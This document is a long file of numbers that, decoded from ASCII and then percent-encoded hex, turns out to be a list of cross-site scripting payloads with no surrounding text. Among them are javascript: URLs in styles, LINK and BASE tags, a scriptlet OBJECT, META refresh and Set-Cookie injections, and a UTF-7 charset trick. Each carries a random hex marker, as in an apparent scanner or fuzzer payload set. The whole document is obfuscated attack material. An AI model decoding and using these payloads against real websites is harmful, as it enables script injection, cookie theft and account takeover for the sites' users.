2,37,54,53,37,55,56,37,55,52,37,50,102,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,50,50,37,51,101,37,51,51,37,54,54,37,51,48,37,51,52,37,51,51,37,54,54,37,54,54,37,54,50,37,51,55,37,51,53,37,51,49,37,51,49,37,51,49,37,51,55,37,51,49,37,51,52,37,51,49,37,54,52,37,51,48,37,54,51,37,51,55,37,51,48,37,51,52,37,51,50,37,51,56,37,54,54,37,51,49,37,51,53,37,51,48,37,51,51,37,51,54,37,51,54,37,51,99,37,50,102,37,53,51,37,53,52,37,53,57,37,52,99,37,52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1,37,53,52,37,53,57,37,52,99,37,52,53,37,51,101,37,50,101,37,54,54,37,51,50,37,54,52,37,54,52,37,51,48,37,51,57,37,54,49,37,54,54,37,51,49,37,51,52,37,54,49,37,51,50,37,51,50,37,51,54,37,54,53,37,51,49,37,51,49,37,51,55,37,54,49,37,51,49,37,51,49,37,51,57,37,51,51,37,51,54,37,51,50,37,51,51,37,54,50,37,54,52,37,54,50,37,54,53,37,51,49,37,51,57,37,55,98,37,54,50,37,54,49,37,54,51,37,54,98,37,54,55,37,55,50,37,54,102,37,55,53,37,54,101,37,54,52,37,50,100,37,54,57,37,54,100,37,54,49,37,54,55,37,54,53,37,51,97,37,55,53,37,55,50,37,54,99,37,50,56,37,50,50,37,54,54,37,51,50,37,54,52,37,54,52,37,51,48,37,51,57,37,54,49,37,54,54,37,51,49,37,51,52,37,54,49,37,51,50,37,51,50,37,51,54,37,54,53,37,51,49,37,51,49,37,51,55,37,54,49,37,51,49,37,51,49,37,51,57,37,51,51,37,51,54,37,51,50,37,51,51,37,54,50,37,54,52,37,54,50,37,54,53,37,51,49,37,51,57,37,50,50,37,50,57,37,51,98,37,55,100,37,51,99,37,50,102,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,101,37,51,99,37,52,49,37,50,48,37,52,51,37,52,99,37,52,49,37,53,51,37,53,51,37,51,100,37,54,54,37,51,50,37,54,52,37,54,52,37,51,48,37,51,57,37,54,49,37,54,54,37,51,49,37,51,52,37,54,49,37,51,50,37,51,50,37,51,54,37,54,53,37,51,49,37,51,49,37,51,55,37,54,49,37,51,49,37,51,49,37,51,57,37,51,51,37,51,54,37,51,50,37,51,51,37,54,50,37,54,52,37,54,50,37,54,53,37,51,49,37,51,57,37,51,101,37,51,99,37,50,102,37,52,49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1,37,53,52,37,53,57,37,52,99,37,52,53,37,50,48,37,55,52,37,55,57,37,55,48,37,54,53,37,51,100,37,50,50,37,55,52,37,54,53,37,55,56,37,55,52,37,50,102,37,54,51,37,55,51,37,55,51,37,50,50,37,51,101,37,52,50,37,52,102,37,52,52,37,53,57,37,55,98,37,54,50,37,54,49,37,54,51,37,54,98,37,54,55,37,55,50,37,54,102,37,55,53,37,54,101,37,54,52,37,51,97,37,55,53,37,55,50,37,54,99,37,50,56,37,50,50,37,51,56,37,51,55,37,51,48,37,51,52,37,51,53,37,51,55,37,51,55,37,54,54,37,51,48,37,51,49,37,51,55,37,54,54,37,54,52,37,54,54,37,51,57,37,51,51,37,51,56,37,51,53,37,51,55,37,51,55,37,51,48,37,51,48,37,54,54,37,51,51,37,51,57,37,51,55,37,54,49,37,51,49,37,51,57,37,54,54,37,51,54,37,51,54,37,50,50,37,50,57,37,55,100,37,51,99,37,50,102,37,53,51,37,53,52,37,53,57,37,52,99,37,52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0,49,37,50,100,37,50,100,37,53,98,37,54,57,37,54,54,37,50,48,37,54,55,37,55,52,37,54,53,37,50,48,37,52,57,37,52,53,37,50,48,37,51,52,37,53,100,37,51,101,37,54,49,37,51,51,37,51,57,37,54,49,37,54,54,37,54,52,37,54,50,37,51,55,37,54,49,37,51,54,37,54,54,37,51,54,37,54,51,37,51,54,37,54,52,37,51,57,37,54,51,37,51,57,37,51,48,37,51,49,37,51,48,37,51,56,37,51,52,37,51,49,37,51,49,37,54,54,37,54,54,37,51,51,37,51,57,37,51,49,37,51,56,37,51,50,37,51,99,37,50,49,37,53,98,37,54,53,37,54,101,37,54,52,37,54,57,37,54,54,37,53,100,37,50,100,37,50,10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0,37,52,49,37,53,51,37,52,53,37,50,48,37,52,56,37,53,50,37,52,53,37,52,54,37,51,100,37,50,50,37,51,54,37,54,50,37,51,54,37,54,53,37,54,54,37,51,52,37,54,49,37,54,51,37,51,51,37,51,48,37,51,56,37,51,49,37,51,55,37,51,50,37,51,54,37,54,50,37,51,52,37,54,52,37,51,57,37,51,54,37,51,57,37,54,52,37,51,53,37,54,51,37,51,56,37,54,51,37,54,52,37,51,56,37,51,48,37,51,50,37,51,49,37,51,56,37,50,102,37,50,102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102,37,52,50,37,52,97,37,52,53,37,52,51,37,53,52,37,50,48,37,54,51,37,54,99,37,54,49,37,55,51,37,55,51,37,54,57,37,54,52,37,51,100,37,54,51,37,54,99,37,55,51,37,54,57,37,54,52,37,51,97,37,54,49,37,54,53,37,51,50,37,51,52,37,54,54,37,54,52,37,54,49,37,54,53,37,50,100,37,51,48,37,51,51,37,54,51,37,51,54,37,50,100,37,51,49,37,51,49,37,54,52,37,51,49,37,50,100,37,51,56,37,54,50,37,51,55,37,51,54,37,50,100,37,51,48,37,51,48,37,51,56,37,51,48,37,54,51,37,51,55,37,51,52,37,51,52,37,54,54,37,51,51,37,51,56,37,51,57,37,51,101,37,51,99,37,55,48,37,54,49,37,55,50,37,54,49,37,54,100,37,50,48,37,54,101,37,54,49,37,54,100,37,54,53,37,51,100,37,55,53,37,55,50,37,54,99,37,50,48,37,55,54,37,54,49,37,54,99,37,55,53,37,54,53,37,51,100,37,51,56,37,51,51,37,54,54,37,51,51,37,51,55,37,51,48,37,51,53,37,51,57,37,51,52,37,54,54,37,51,54,37,54,51,37,51,52,37,51,50,37,54,54,37,54,49,37,51,57,37,51,54,37,54,51,37,51,55,37,54,51,37,54,53,37,51,55,37,51,55,37,51,57,37,51,57,37,51,55,37,54,54,37,51,57,37,54,52,37,54,49,37,51,49,37,51,101,37,51,99,37,50,102,37,52,102,37,52,50,37,52,97,37,52,53,37,52,51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4,49,37,51,100,37,50,50,37,54,55,37,54,53,37,55,52,37,50,50,37,51,98,37,54,50,37,51,100,37,50,50,37,53,53,37,53,50,37,52,99,37,50,56,37,50,50,37,50,50,37,51,98,37,54,51,37,51,100,37,50,50,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,50,50,37,51,98,37,54,52,37,51,100,37,50,50,37,51,54,37,51,50,37,51,56,37,54,54,37,51,50,37,54,51,37,51,48,37,54,54,37,54,52,37,51,57,37,51,56,37,51,56,37,51,53,37,54,51,37,54,51,37,54,49,37,51,48,37,51,52,37,54,50,37,54,52,37,51,56,37,54,49,37,51,57,37,51,49,37,54,53,37,54,50,37,54,49,37,54,49,37,54,50,37,54,51,37,54,49,37,51,51,37,50,50,37,50,57,37,50,50,37,51,98,37,54,53,37,55,54,37,54,49,37,54,99,37,50,56,37,54,49,37,50,98,37,54,50,37,50,98,37,54,51,37,50,98,37,54,52,37,50,57,37,51,9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1,102,37,50,48,37,54,53,37,54,51,37,54,56,37,54,102,37,50,56,37,50,55,37,51,99,37,53,51,37,52,51,37,53,50,37,50,57,37,50,55,37,51,98,37,54,53,37,54,51,37,54,56,37,54,102,37,50,56,37,50,55,37,52,57,37,53,48,37,53,52,37,51,101,37,54,51,37,54,49,37,54,51,37,51,52,37,51,56,37,51,54,37,54,54,37,51,52,37,51,55,37,51,49,37,51,48,37,54,51,37,51,55,37,51,53,37,54,51,37,51,51,37,54,54,37,54,54,37,51,49,37,51,55,37,54,53,37,54,52,37,51,57,37,51,57,37,54,50,37,51,53,37,51,50,37,54,54,37,51,52,37,54,51,37,51,53,37,54,51,37,51,99,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,51,101,37,50,55,37,50,57,37,51,98,37,50,48,37,51,10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100,37,52,53,37,53,52,37,52,49,37,50,48,37,52,56,37,53,52,37,53,52,37,53,48,37,50,100,37,52,53,37,53,49,37,53,53,37,52,57,37,53,54,37,51,100,37,50,50,37,53,51,37,54,53,37,55,52,37,50,100,37,52,51,37,54,102,37,54,102,37,54,98,37,54,57,37,54,53,37,50,50,37,50,48,37,52,51,37,54,102,37,54,101,37,55,52,37,54,53,37,54,101,37,55,52,37,51,100,37,50,50,37,53,53,37,53,51,37,52,53,37,53,50,37,52,57,37,52,52,37,51,100,37,50,54,37,54,99,37,55,52,37,51,98,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,50,54,37,54,55,37,55,52,37,51,98,37,54,54,37,51,57,37,51,51,37,51,48,37,54,49,37,51,50,37,54,50,37,51,50,37,51,56,37,51,52,37,51,54,37,54,53,37,51,56,37,51,53,37,54,50,37,54,52,37,51,53,37,51,50,37,54,53,37,51,55,37,54,52,37,51,49,37,54,49,37,51,50,37,54,52,37,51,52,37,51,55,37,54,51,37,51,56,37,51,56,37,51,52,37,54,53,37,50,54,37,54,99,37,55,52,37,51,98,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,50,54,37,54,55,37,55,52,37,51,98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1,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,54,56,37,55,52,37,55,52,37,55,48,37,51,97,37,50,102,37,50,102,37,51,49,37,51,50,37,51,55,37,50,101,37,51,48,37,50,101,37,51,48,37,50,101,37,51,49,37,51,101,37,51,49,37,51,50,37,54,50,37,51,50,37,54,52,37,51,54,37,51,55,37,54,53,37,51,57,37,51,49,37,51,54,37,51,56,37,51,53,37,54,54,37,51,52,37,51,48,37,54,54,37,51,54,37,51,51,37,54,49,37,54,54,37,54,53,37,51,49,37,51,51,37,51,50,37,51,53,37,54,50,37,51,50,37,51,52,37,51,51,37,54,49,37,54,52,37,51,99,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48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0,50,37,50,54,37,51,49,37,51,52,37,51,98,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,54,52,37,51,49,37,54,53,37,51,55,37,51,49,37,51,54,37,51,49,37,54,53,37,51,48,37,51,54,37,51,56,37,51,56,37,54,53,37,51,57,37,54,51,37,54,51,37,51,50,37,51,51,37,51,49,37,51,57,37,51,52,37,51,48,37,51,49,37,54,49,37,54,51,37,51,49,37,54,53,37,51,50,37,51,51,37,51,52,37,51,49,37,51,56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0,50,37,54,97,37,54,49,37,55,54,37,50,54,37,50,51,37,55,56,37,51,48,37,52,52,37,51,98,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,52,37,51,53,37,54,52,37,54,52,37,54,53,37,51,52,37,54,52,37,51,54,37,51,52,37,54,49,37,54,49,37,54,53,37,54,49,37,54,52,37,51,57,37,51,52,37,51,52,37,51,57,37,51,53,37,51,50,37,54,50,37,54,49,37,51,51,37,54,52,37,51,48,37,51,53,37,54,54,37,51,48,37,51,55,37,51,57,37,51,52,37,51,52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100,37,50,100,37,50,100,37,50,48,37,51,99,37,52,57,37,52,100,37,52,55,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,50,48,37,50,54,37,50,51,37,51,49,37,51,52,37,51,98,37,50,48,37,50,48,37,51,56,37,54,50,37,54,49,37,54,51,37,51,52,37,51,56,37,51,56,37,54,51,37,51,55,37,51,51,37,54,51,37,54,54,37,51,51,37,54,51,37,51,55,37,54,50,37,51,50,37,51,48,37,51,57,37,51,48,37,51,55,37,51,56,37,51,52,37,54,50,37,54,49,37,51,55,37,51,53,37,54,53,37,54,51,37,51,55,37,51,50,37,54,51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100,37,50,100,37,50,100,37,50,48,37,51,99,37,52,57,37,52,100,37,52,55,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,54,49,37,51,51,37,51,52,37,54,51,37,54,54,37,51,55,37,51,53,37,51,56,37,54,52,37,51,49,37,51,50,37,51,56,37,54,52,37,54,52,37,51,51,37,51,54,37,54,54,37,54,50,37,51,53,37,54,52,37,51,51,37,51,53,37,51,51,37,54,49,37,54,53,37,54,52,37,54,54,37,54,51,37,54,53,37,51,53,37,54,50,37,54,49,37,50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1,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,51,101,37,54,49,37,51,100,37,50,102,37,51,51,37,51,49,37,54,50,37,54,50,37,54,54,37,54,49,37,51,49,37,54,54,37,51,55,37,51,53,37,51,54,37,54,54,37,51,54,37,51,52,37,51,57,37,51,54,37,51,56,37,51,50,37,51,56,37,54,52,37,54,49,37,54,54,37,51,49,37,54,54,37,51,50,37,54,49,37,54,50,37,51,48,37,51,55,37,51,55,37,54,51,37,54,50,37,50,102,37,54,49,37,54,99,37,54,53,37,55,50,37,55,52,37,50,56,37,54,49,37,50,101,37,55,51,37,54,102,37,55,53,37,55,50,37,54,51,37,54,53,37,50,57,37,51,99,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48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100,37,50,100,37,50,100,37,50,48,37,50,50,37,51,98,37,54,54,37,51,48,37,54,52,37,51,49,37,54,49,37,51,49,37,51,54,37,51,48,37,54,49,37,54,49,37,54,50,37,54,52,37,51,56,37,51,55,37,54,54,37,51,50,37,51,55,37,51,54,37,54,49,37,54,50,37,51,49,37,51,54,37,54,51,37,51,50,37,54,49,37,51,53,37,54,52,37,54,49,37,51,50,37,51,49,37,51,48,37,51,49,37,51,98,37,50,102,37,50,10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100,37,52,53,37,53,52,37,52,49,37,50,48,37,52,56,37,53,52,37,53,52,37,53,48,37,50,100,37,52,53,37,53,49,37,53,53,37,52,57,37,53,54,37,54,102,37,50,50,37,55,50,37,54,53,37,54,54,37,55,50,37,54,53,37,55,51,37,54,56,37,50,50,37,50,48,37,52,51,37,52,102,37,52,101,37,53,52,37,52,53,37,52,101,37,53,52,37,51,100,37,50,50,37,51,48,37,51,98,37,50,48,37,53,53,37,53,50,37,52,99,37,51,100,37,54,56,37,55,52,37,55,52,37,55,48,37,51,97,37,50,102,37,50,102,37,51,98,37,53,53,37,53,50,37,52,99,37,51,100,37,51,48,37,54,54,37,54,54,37,51,50,37,51,52,37,54,51,37,54,54,37,51,56,37,51,53,37,54,49,37,51,51,37,51,50,37,51,56,37,51,48,37,51,52,37,54,54,37,51,56,37,54,49,37,54,52,37,51,48,37,51,52,37,54,53,37,51,50,37,51,51,37,51,54,37,54,54,37,51,50,37,54,50,37,51,50,37,51,48,37,51,54,37,51,49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1,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,50,48,37,51,99,37,52,50,37,51,101,37,51,100,37,51,51,37,51,57,37,54,53,37,54,54,37,54,51,37,54,50,37,54,54,37,54,51,37,51,56,37,51,53,37,51,48,37,51,57,37,54,52,37,51,52,37,54,52,37,51,56,37,51,56,37,54,53,37,51,57,37,54,54,37,51,56,37,51,51,37,54,50,37,54,51,37,51,56,37,51,48,37,51,51,37,54,52,37,51,48,37,51,54,37,51,56,37,51,57,37,50,50,37,51,101,37,51,99,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48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54,37,53,50,37,52,49,37,52,100,37,52,53,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,49,37,51,49,37,54,53,37,51,48,37,51,53,37,54,50,37,54,51,37,54,53,37,54,51,37,54,49,37,54,50,37,51,55,37,51,55,37,54,54,37,51,55,37,51,53,37,54,50,37,51,49,37,51,57,37,51,52,37,51,56,37,51,53,37,51,53,37,54,51,37,51,51,37,51,54,37,51,53,37,54,52,37,51,56,37,54,54,37,51,52,37,54,52,37,50,48,37,51,9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1,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,51,101,37,54,49,37,51,100,37,50,102,37,51,56,37,51,49,37,51,54,37,51,50,37,51,50,37,51,48,37,54,51,37,51,51,37,51,53,37,51,49,37,51,49,37,51,56,37,51,55,37,51,56,37,51,55,37,51,55,37,54,54,37,51,57,37,51,50,37,54,51,37,54,53,37,51,48,37,51,48,37,54,49,37,54,51,37,54,51,37,51,49,37,51,57,37,51,53,37,54,50,37,51,48,37,51,49,37,50,102,37,54,101,37,51,56,37,51,49,37,51,54,37,51,50,37,51,50,37,51,48,37,54,51,37,51,51,37,51,53,37,51,49,37,51,49,37,51,56,37,51,55,37,51,56,37,51,55,37,51,55,37,54,54,37,51,57,37,51,50,37,54,51,37,54,53,37,51,48,37,51,48,37,54,49,37,54,51,37,54,51,37,51,49,37,51,57,37,51,53,37,54,50,37,51,48,37,51,49,37,51,99,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48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99,37,52,49,37,53,57,37,52,53,37,53,50,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,54,52,37,51,56,37,51,50,37,51,57,37,54,52,37,54,54,37,54,49,37,51,48,37,54,50,37,51,50,37,54,52,37,51,56,37,54,49,37,51,54,37,51,56,37,51,50,37,54,52,37,51,56,37,51,48,37,51,52,37,51,48,37,54,49,37,51,55,37,51,48,37,51,57,37,51,56,37,51,57,37,51,48,37,51,49,37,51,50,37,54,50,37,51,52,37,51,101,37,51,99,37,50,102,37,52,99,37,52,49,37,53,57,37,52,53,37,53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1,37,53,52,37,53,57,37,52,99,37,52,53,37,51,101,37,54,99,37,54,57,37,50,48,37,55,98,37,54,99,37,54,57,37,55,51,37,55,52,37,50,100,37,55,51,37,55,52,37,55,57,37,54,99,37,54,53,37,50,100,37,54,57,37,54,100,37,54,49,37,54,55,37,54,53,37,51,97,37,50,48,37,55,53,37,55,50,37,54,99,37,50,56,37,50,50,37,51,51,37,54,50,37,54,52,37,54,52,37,51,56,37,54,50,37,54,52,37,51,50,37,51,54,37,51,57,37,51,53,37,51,55,37,54,52,37,51,50,37,51,52,37,54,52,37,51,50,37,51,55,37,54,49,37,51,49,37,51,57,37,51,53,37,54,50,37,51,50,37,51,53,37,51,51,37,54,53,37,51,50,37,54,52,37,51,48,37,51,48,37,54,50,37,51,99,37,50,102,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,101,37,51,99,37,53,53,37,52,99,37,51,101,37,51,99,37,52,99,37,52,57,37,51,101,37,51,51,37,54,50,37,54,52,37,54,52,37,51,56,37,54,50,37,54,52,37,51,50,37,51,54,37,51,57,37,51,53,37,51,55,37,54,52,37,51,50,37,51,52,37,54,52,37,51,50,37,51,55,37,54,49,37,51,49,37,51,57,37,51,53,37,54,50,37,51,50,37,51,53,37,51,51,37,54,53,37,51,50,37,54,52,37,51,48,37,51,48,37,54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2,37,52,57,37,53,54,37,50,48,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,100,37,50,50,37,54,50,37,54,49,37,54,51,37,54,98,37,54,55,37,55,50,37,54,102,37,55,53,37,54,101,37,54,52,37,50,100,37,54,57,37,54,100,37,54,49,37,54,55,37,54,53,37,51,97,37,50,48,37,55,53,37,55,50,37,54,99,37,50,56,37,50,54,37,50,51,37,51,49,37,51,98,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,54,50,37,51,53,37,54,52,37,54,54,37,51,49,37,54,49,37,51,49,37,51,49,37,51,50,37,51,57,37,54,54,37,54,52,37,51,55,37,51,50,37,54,52,37,54,50,37,51,56,37,54,51,37,51,56,37,54,49,37,54,54,37,54,51,37,51,50,37,51,57,37,51,52,37,54,49,37,51,48,37,54,51,37,51,48,37,51,55,37,51,48,37,51,50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6,37,52,53,37,52,49,37,52,52,37,51,101,37,51,99,37,52,100,37,52,53,37,53,52,37,52,49,37,50,48,37,52,56,37,53,52,37,53,52,37,53,48,37,50,100,37,52,53,37,53,49,37,53,53,37,52,57,37,53,54,37,51,100,37,50,50,37,52,51,37,52,102,37,52,101,37,53,52,37,52,53,37,52,101,37,53,52,37,50,100,37,53,52,37,53,57,37,53,48,37,52,53,37,50,50,37,50,48,37,52,51,37,52,102,37,52,101,37,53,52,37,52,53,37,52,101,37,53,52,37,51,100,37,50,50,37,55,52,37,54,53,37,55,56,37,55,52,37,50,102,37,54,56,37,55,52,37,54,100,37,54,99,37,51,98,37,50,48,37,54,51,37,54,56,37,54,49,37,55,50,37,55,51,37,54,53,37,55,52,37,51,100,37,53,53,37,53,52,37,52,54,37,50,100,37,51,55,37,50,50,37,51,101,37,51,99,37,50,102,37,52,56,37,52,53,37,52,49,37,52,52,37,51,101,37,50,98,37,52,49,37,52,52,37,55,55,37,50,100,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,50,98,37,52,49,37,52,52,37,51,52,37,50,100,37,51,50,37,51,52,37,51,53,37,54,50,37,54,50,37,51,53,37,54,50,37,54,51,37,54,50,37,51,54,37,54,53,37,51,50,37,54,53,37,54,52,37,54,52,37,51,52,37,54,52,37,51,53,37,51,50,37,54,51,37,51,48,37,51,51,37,51,50,37,51,50,37,51,53,37,54,54,37,54,49,37,51,57,37,51,48,37,51,51,37,51,48,37,54,53,37,50,98,37,52,49,37,52,52,37,55,55,37,50,100,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,50,98,37,52,49,37,52,52,37,51,52,37,50,10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49,37,50,48,37,54,56,37,55,50,37,54,53,37,54,54,37,51,100,37,50,50,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,50,51,37,51,52,37,54,49,37,51,54,37,51,50,37,51,55,37,51,55,37,51,49,37,51,56,37,54,51,37,51,54,37,54,53,37,54,54,37,51,50,37,51,56,37,54,52,37,51,51,37,51,51,37,54,54,37,51,51,37,51,56,37,51,49,37,51,49,37,51,56,37,51,54,37,54,51,37,51,52,37,51,55,37,51,57,37,54,54,37,54,50,37,54,49,37,51,49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101,37,55,48,37,55,53,37,55,52,37,50,48,37,55,52,37,55,57,37,55,48,37,54,53,37,51,100,37,50,50,37,54,57,37,54,100,37,54,49,37,54,55,37,54,53,37,50,50,37,50,48,37,54,52,37,55,57,37,54,101,37,55,51,37,55,50,37,54,51,37,51,100,37,50,50,37,54,52,37,51,51,37,51,51,37,51,57,37,51,50,37,54,51,37,54,52,37,54,49,37,54,51,37,51,50,37,51,51,37,54,50,37,51,52,37,51,56,37,51,56,37,51,55,37,51,54,37,54,50,37,54,49,37,54,54,37,54,54,37,54,52,37,51,52,37,54,52,37,51,49,37,51,56,37,51,48,37,51,53,37,54,54,37,51,53,37,51,50,37,51,51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54,37,54,53,37,51,51,37,51,57,37,51,57,37,54,53,37,54,51,37,51,57,37,51,49,37,54,53,37,54,51,37,51,56,37,54,52,37,54,51,37,51,55,37,51,56,37,51,56,37,54,53,37,51,51,37,54,54,37,54,54,37,51,54,37,54,54,37,51,49,37,51,54,37,54,49,37,51,57,37,51,54,37,51,56,37,51,52,37,51,53,37,51,53,37,51,50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54,37,55,98,37,51,54,37,54,54,37,51,48,37,51,54,37,51,49,37,54,52,37,51,57,37,51,56,37,54,53,37,51,56,37,51,48,37,54,52,37,54,50,37,51,57,37,54,50,37,51,55,37,54,49,37,54,49,37,51,55,37,51,52,37,51,53,37,54,54,37,51,57,37,54,53,37,51,50,37,51,57,37,51,49,37,51,57,37,51,54,37,54,52,37,51,49,37,54,51,37,55,100,37,51,9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7,37,52,100,37,52,55,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,54,37,55,98,37,54,54,37,54,49,37,54,52,37,54,49,37,51,54,37,54,51,37,54,50,37,51,50,37,51,57,37,54,53,37,54,50,37,51,57,37,51,53,37,54,51,37,51,56,37,54,53,37,51,54,37,51,57,37,54,54,37,54,52,37,54,52,37,51,55,37,51,48,37,51,52,37,51,56,37,51,52,37,54,52,37,54,50,37,54,54,37,51,52,37,51,56,37,51,51,37,55,100,37,51,98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49,37,50,48,37,54,56,37,55,50,37,54,53,37,54,54,37,51,100,37,50,50,37,54,49,37,54,50,37,54,102,37,55,53,37,55,52,37,51,97,37,54,53,37,51,48,37,51,49,37,51,51,37,51,56,37,54,52,37,51,48,37,54,50,37,54,52,37,54,50,37,51,54,37,51,51,37,51,54,37,51,56,37,54,52,37,51,57,37,51,57,37,51,52,37,54,53,37,54,50,37,54,54,37,54,50,37,54,49,37,54,53,37,51,54,37,51,51,37,54,54,37,54,52,37,51,53,37,54,52,37,51,52,37,51,48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52,37,52,57,37,53,54,37,50,48,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,100,37,50,50,37,54,50,37,54,57,37,54,101,37,54,52,37,54,57,37,54,101,37,54,55,37,51,97,37,50,48,37,55,53,37,55,50,37,54,99,37,50,56,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,57,37,51,50,37,54,50,37,54,51,37,54,50,37,51,52,37,54,54,37,54,52,37,51,50,37,51,53,37,54,50,37,51,53,37,51,48,37,51,54,37,51,55,37,54,51,37,51,56,37,54,52,37,51,56,37,51,50,37,54,50,37,51,56,37,54,49,37,51,50,37,51,55,37,54,50,37,54,50,37,54,51,37,54,54,37,51,57,37,51,49,37,51,55,37,50,57,37,51,98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2,102,37,52,50,37,52,97,37,52,53,37,52,51,37,53,52,37,50,48,37,54,51,37,54,99,37,54,49,37,55,51,37,55,51,37,54,57,37,54,52,37,51,100,37,54,51,37,54,99,37,55,51,37,54,57,37,54,52,37,51,97,37,50,101,37,50,101,37,50,101,37,50,50,37,50,48,37,54,51,37,54,102,37,54,52,37,54,53,37,54,50,37,54,49,37,55,51,37,54,53,37,51,100,37,50,50,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,52,37,54,50,37,51,55,37,51,49,37,51,52,37,51,54,37,51,48,37,51,50,37,54,50,37,54,49,37,54,52,37,54,52,37,51,56,37,51,49,37,54,51,37,54,51,37,54,52,37,51,51,37,51,56,37,54,52,37,54,50,37,51,50,37,51,53,37,51,49,37,51,54,37,51,55,37,51,50,37,54,53,37,51,48,37,51,57,37,54,50,37,51,55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5,51,37,55,52,37,55,57,37,54,99,37,54,53,37,51,101,37,51,99,37,50,49,37,50,100,37,50,100,37,51,99,37,50,102,37,55,51,37,55,52,37,55,57,37,54,99,37,54,53,37,51,101,37,51,99,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,51,101,37,54,50,37,51,52,37,54,50,37,51,53,37,51,56,37,54,53,37,54,52,37,54,53,37,51,52,37,54,51,37,51,50,37,54,54,37,54,50,37,54,50,37,54,51,37,54,49,37,51,55,37,54,53,37,51,52,37,54,54,37,51,53,37,54,49,37,51,50,37,51,50,37,51,50,37,51,54,37,54,49,37,51,50,37,54,54,37,54,50,37,51,56,37,54,54,37,50,102,37,50,102,37,50,100,37,50,100,37,51,101,37,51,99,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48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0,49,37,53,98,37,52,51,37,52,52,37,52,49,37,53,52,37,52,49,37,53,98,37,51,99,37,50,49,37,50,100,37,50,100,37,53,100,37,53,100,37,51,99,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,51,101,37,51,55,37,54,54,37,51,49,37,51,51,37,54,54,37,51,52,37,51,52,37,54,50,37,51,49,37,51,52,37,54,53,37,54,52,37,54,52,37,54,54,37,54,51,37,54,52,37,54,50,37,51,48,37,51,48,37,51,51,37,51,49,37,51,57,37,51,57,37,51,50,37,54,52,37,51,56,37,51,50,37,51,49,37,51,54,37,51,53,37,54,50,37,51,50,37,50,102,37,50,102,37,50,100,37,50,100,37,51,101,37,51,99,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52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0,49,37,50,100,37,50,100,37,50,48,37,50,100,37,50,100,37,50,48,37,50,100,37,50,100,37,51,101,37,51,56,37,54,52,37,54,52,37,51,50,37,51,57,37,51,53,37,51,49,37,54,52,37,54,51,37,51,57,37,51,48,37,51,53,37,54,53,37,51,54,37,51,50,37,51,48,37,51,53,37,54,53,37,54,51,37,54,53,37,51,49,37,54,52,37,51,48,37,54,54,37,54,54,37,54,49,37,51,56,37,51,57,37,54,50,37,51,56,37,54,54,37,54,52,37,51,99,37,50,49,37,50,100,37,50,100,37,50,48,37,50,100,37,50,100,37,50,48,37,50,100,37,50,10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5,56,37,54,100,37,54,99,37,50,48,37,54,57,37,54,52,37,51,100,37,50,50,37,53,56,37,50,50,37,51,101,37,51,99,37,54,49,37,51,101,37,51,99,37,54,50,37,51,101,37,54,54,37,54,54,37,54,53,37,51,50,37,51,57,37,51,50,37,51,52,37,54,51,37,54,52,37,51,57,37,54,50,37,51,54,37,51,48,37,51,48,37,54,49,37,54,54,37,51,49,37,51,49,37,54,50,37,51,55,37,51,49,37,51,56,37,51,48,37,54,52,37,51,56,37,51,54,37,54,50,37,51,48,37,51,49,37,51,57,37,51,51,37,51,53,37,51,98,37,51,99,37,54,50,37,51,101,37,51,99,37,50,102,37,54,49,37,51,101,37,51,99,37,50,102,37,55,56,37,54,100,37,54,99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2,37,54,57,37,55,54,37,50,48,37,54,52,37,54,49,37,55,52,37,54,49,37,54,54,37,54,99,37,54,52,37,51,100,37,50,50,37,54,50,37,50,50,37,50,48,37,54,52,37,54,49,37,55,52,37,54,49,37,54,54,37,54,102,37,55,50,37,54,100,37,54,49,37,55,52,37,54,49,